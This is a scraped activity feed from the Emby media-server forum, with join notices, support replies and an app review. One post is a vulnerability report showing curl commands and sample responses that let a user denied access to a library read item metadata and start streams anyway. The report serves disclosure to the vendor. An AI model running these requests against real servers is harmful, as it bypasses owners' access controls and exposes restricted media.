All Activity
- Past hour
-
jasonh1974 joined the community
-
ugafe131568 joined the community
-
Alexoune joined the community
-
blackhat joined the community
-
jorgetovar joined the community
-
Alexanne joined the community
-
Doda123ueuehe joined the community
-
Atrium — a native tvOS app for your Emby server
Grumpy1 replied to vdatanet's topic in Third Party Apps
Thanks Looks Good -
cesararcos joined the community
-
Gentid joined the community
-
Saldouk joined the community
-
What Focus widget? Where is this thing?
- Today
-
Hi and thanks for the reply. Actually, most users are external and most media is transcoded. I will take some measurements of the 2U case for possibilities, but it is pretty tight in there. Having a dedicated NVME for transcoding cache might be a goods idea. I am currently using a standard SSD as the existing mobo only has one slot for NVME but the newer mobo I am looking at supports 2. Cheers
-
we have not tested dotnet 9 so just be aware of that.
-
Hi there, let's look at an example. Please attach the information requested in how to report a media playback issue. Thanks!
-
Not sure what you mean by 'run it manually', but I ran the pkg install < dependencies> from the URL, and it installed dotnet8-8.0.20, but when I checked, dotnet-9.0.14 was already installed, so I'm not sure what's going on there. Anyway, updating to 4.9.5.0 or 4.10.0.40 fails to start the emby-server service again. It does appear to be running for a few seconds, but then stops, and it's not writing anything to the embyserver.txt file Perhaps my emby journey on TrueNAS comes to an end at 4.9.3.0, which is still working just fine. I need to consider moving away from TrueNAS Core but it's too big and scary at the minute and everything I'm running is still working .
-
OK we'll take a look at it. Thanks.
-
Playernet started following New Emby Server 4.10.0.40 Released
-
Tengo un problemas que no he podido resolver de un tiempo para aca, me sale este error y no puedo reproducir en ningun dispositivo.
-
OK please keep us posted on how things go. Thanks.
- 31 replies
-
- connection
- server
-
(and 1 more)
Tagged with:
-
Can you send me the code if you have it in a PM? The download is not working after i foolishly tried to clean my Emby messages and i can't seem to find it on my computer. It's there some where on my computer but it's a mess and i simply can't remember where. Btw. have you seen this: Maybe it's worth waiting a little.
-
Can you capture the contents of the browser debug console when this happens? Thanks.
-
Hi, no, we did not want to throw this in at the last minute.
-
OK, can you please show a screenshot? Thanks.
-
hi, how did you even import an svg? This is not a supported image type on the server.
-
Just to clarify - the option to show or not show in tv mode only works just fine.
-
Are all your Users able to Direct Play all your media files ? No transcoding needed ? I know getting a gpu in a 2U case can be a pain …. I build myself a new Emby server in 12/25 and went with: Intel(R) Core(TM) Ultra 5 225F 32GB RAM 500GB NVME for Fedora 1TB NVME vor transcode cache ARC 580 GPU This way I was able to reencode all H264 files to AV1, on the same machine, while parallel emby and some dockers are running. And everytime I forget to set the Diagnostic Options, after reboot, I see the CPU is hardly handling one AV1 transcode.
-
Sure thing, i will send you a DM
-
A request to Emby - please clarify the situation with the AndroidTv app
lbkBrad replied to ecrispy's topic in Android TV / Fire TV
I mostly use Roku, but I finally watched a movie on the 'new' Emby android app (hisense 4k tv w/android 14) and thought I'd comment. First, I think it's great that Emby is making both old and new android clients available to users. When Plex began their 'new experience' GUI and started the war (never have I seen such anger in forum threads), some plex users asked for the old client to be made available unmaintained at least for a while, but it didn't happen. Emby seems to not just be doing that, but even apparently making some minor updates to the old client - I think this is a better approach and Emby should be commended for doing so. I didn't have any issues watching a movie on the android client. It played fine, looked good, and (remote) navigation was normal. I also think the appearance of the android app is pretty good. Because of plex issues and an intensive jellyfin trial I did, I've probably used at least a dozen client GUIs in recent months - I'd say the Emby android app is probably up there with the best of them looks-wise. Also, the 3-dots/ellipsis button having access to metadata/image editing and other things usually done in the server web interface is really cool (I think only plex is barely starting to do this with some of their preview/beta apps). I'm not trying to say the new android client is perfect. For instance, I can only see 12 movies on my 'newly added' row, which is incredibly short (I thought I had misconfigured something, but found no setting). As someone very dependent on the newly-added list for watching, that would probably be too short for me to use this as my primary client. But I guess that's why the old client is available huh. Regardless, it seems like the new android client is moving in a good direction....and of course all this is mostly personal preference and that's just mine. -
Charlo started following New Emby Server 4.10.0.40 Released
-
Does not work for Web (not used on TV) and Android on Smartphone because TV layout is not enabled and this modi rely to the same setting (show with disabled TV mode). But thanks anyways.
-
Looks nothing like that .... I am not altering the firestick setting as ever other app works fine including "Emby for Fire TV" so the problem is with the other "Emby" app. So I will continue to use "Emby for Fire TV" or Plex or VLC when watching movies with a DTS audio track when using my Fire Stick. Thanks for your efforts anyway.
-
All good!
-
Hi. You can have it show only on TV layouts.
-
cnstarz started following Users can enumerate and start transcode streams to items in libraries that they shouldn't have access to
-
Emby Server Version: 4.10.0.40 Emby doesn't enforce library ACLs on direct-by-ID lookup. I have a user named "deleteme2" that doesn't have access to my Movies library, yet this user can query items in the Movies library just fine. Here's how to replicate it in Linux through CLI: # leading space keeps this out of shell history if HISTCONTROL=ignorespace/ignoreboth is set # Set the Emby URL, and username/password of user that doesn't have access to the library item EMBY_URL="http://emby.url" DENIED_USERNAME="deleteme2" DENIED_PASSWORD="password" # Get a real access token from the user curl -s -X POST "${EMBY_URL}/Users/AuthenticateByName" \ -H 'Content-Type: application/json' \ -H 'X-Emby-Authorization: Emby Client="curl-test", Device="curl", DeviceId="curl-test-device", Version="1.0.0"' \ -d "{\"Username\":\"${DENIED_USERNAME}\",\"Pw\":\"${DENIED_PASSWORD}\"}" | tee /tmp/auth.json | jq . DENIED_TOKEN=$(jq -r '.AccessToken' /tmp/auth.json) DENIED_USER_ID=$(jq -r '.User.Id' /tmp/auth.json) # Set the ITEM_ID of the media item in a library the user doesn't have access to ITEM_ID="1234567" # Get metadata related to the item curl -s -o /tmp/getitem.json -w '\nHTTP %{http_code}\n' \ "${EMBY_URL}/Users/${DENIED_USER_ID}/Items/${ITEM_ID}?Fields=SeriesName" \ -H "X-Emby-Token: ${DENIED_TOKEN}" cat /tmp/getitem.json | jq ######################################### ### ### EXAMPLE OUTOUT ### HTTP 200 { "Name": "Family Guy Presents: Blue Harvest", "OriginalTitle": "Family Guy Presents: Blue Harvest", "ServerId": "REDACTED", "Id": "1234567", <...snip...> We can go further and start a stream in the library that we shouldn't have access to: curl -s -o /tmp/playbackinfo.json -w '\nHTTP %{http_code}\n' \ -X POST "${EMBY_URL}/Items/${ITEM_ID}/PlaybackInfo" \ -H "X-Emby-Token: ${DENIED_TOKEN}" \ -H 'Content-Type: application/json' \ -d @- <<EOF { "UserId": "${DENIED_USER_ID}", "DeviceProfile": { "MaxStreamingBitrate": 120000000, "DirectPlayProfiles": [ {"Container": "mp4,m4v", "Type": "Video", "VideoCodec": "h264,vp9,av1", "AudioCodec": "aac,mp3,opus,flac"} ], "TranscodingProfiles": [ {"Container": "ts", "Type": "Video", "VideoCodec": "h264", "AudioCodec": "aac", "Protocol": "hls", "Context": "Streaming"} ] }, "AutoOpenLiveStream": false, "StartTimeTicks": 0, "EnableDirectPlay": true, "EnableDirectStream": true, "EnableTranscoding": true, "AllowVideoStreamCopy": true, "AllowAudioStreamCopy": true } EOF cat /tmp/playbackinfo.json | jq . ######################################### ### ### EXAMPLE OUTOUT ### HTTP 200 { "MediaSources": [ { "Chapters": [ { "StartPositionTicks": 0, "Name": "Chapter 01", "ImageTag": "b2f1fb884f03d1be088b4842ca0f34c7_0", "MarkerType": "Chapter", "ChapterIndex": 0 }, <...snip...> ], "Protocol": "File", "Id": "mediasource_1234567", "Path": "/media/movies/Family Guy Presents Blue Harvest (2008) [imdb-tt0888817]/Family Guy Presents Blue Harvest (2007) [Bluray-1080p][AC3 5.1][x264].mp4", "Type": "Default", <...snip...> "TranscodingUrl": "/videos/1234567/master.m3u8?DeviceId=curl-test-device&MediaSourceId=mediasource_1234567&PlaySessionId=REDACTED&api_key=REDACTED&VideoCodec=h264&AudioCodec=aac&VideoBitrate=119360000&AudioBitrate=640000&AudioStreamIndex=1&SegmentContainer=ts&BreakOnNonKeyFrames=False&TranscodeReasons=AudioCodecNotSupported", "TranscodingSubProtocol": "hls", "TranscodingContainer": "ts", "ReadAtNativeFramerate": false, "DefaultAudioStreamIndex": 1, "ItemId": "1234567", "MimeType": "video/mp4", "TranscodingMimeType": "video/mp2t" } ], "PlaySessionId": "REDACTED" } embyserver(6).txt
-
- security
- enumeration
-
(and 2 more)
Tagged with:
-
-
I've been buried in work and got a few minutes today to drop by. Would this change be in 4.10.0.40?
